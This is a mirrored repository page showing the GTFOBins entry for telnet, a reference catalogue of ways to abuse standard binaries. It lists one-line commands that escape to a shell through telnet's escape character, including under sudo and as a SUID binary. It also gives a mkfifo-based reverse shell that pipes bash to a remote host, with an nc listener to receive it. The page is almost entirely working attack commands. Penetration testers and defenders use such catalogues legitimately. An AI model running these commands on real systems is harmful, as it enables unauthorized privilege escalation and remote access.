This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-09 00:41:33 +01:00
Code
Issues
ac79267e7e
GTFOBins.github.io
/
_gtfobins
/
telnet.md
Emilio Pinna
0a5168dc9a
Replace default port number with 12345
2018-05-23 08:08:13 +01:00
803 B
Raw
Blame
History
functions
exec-interactive
reverse-shell
sudo-enabled
suid-limited
description
code
BSD version only.
RHOST=www.google.com RPORT=80 telnet $RHOST $RPORT ^] !/bin/sh
description
code
Run `nc -l -p 12345` to receive the shell on the other end.
RHOST=10.0.0.1 RPORT=12345 TF=$(mktemp) rm $TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
description
code
BSD version only.
RHOST=www.google.com RPORT=80 sudo telnet $RHOST $RPORT ^] !/bin/sh
description
code
BSD version only.
RHOST=www.google.com RPORT=80 ./telnet $RHOST $RPORT ^] !/bin/sh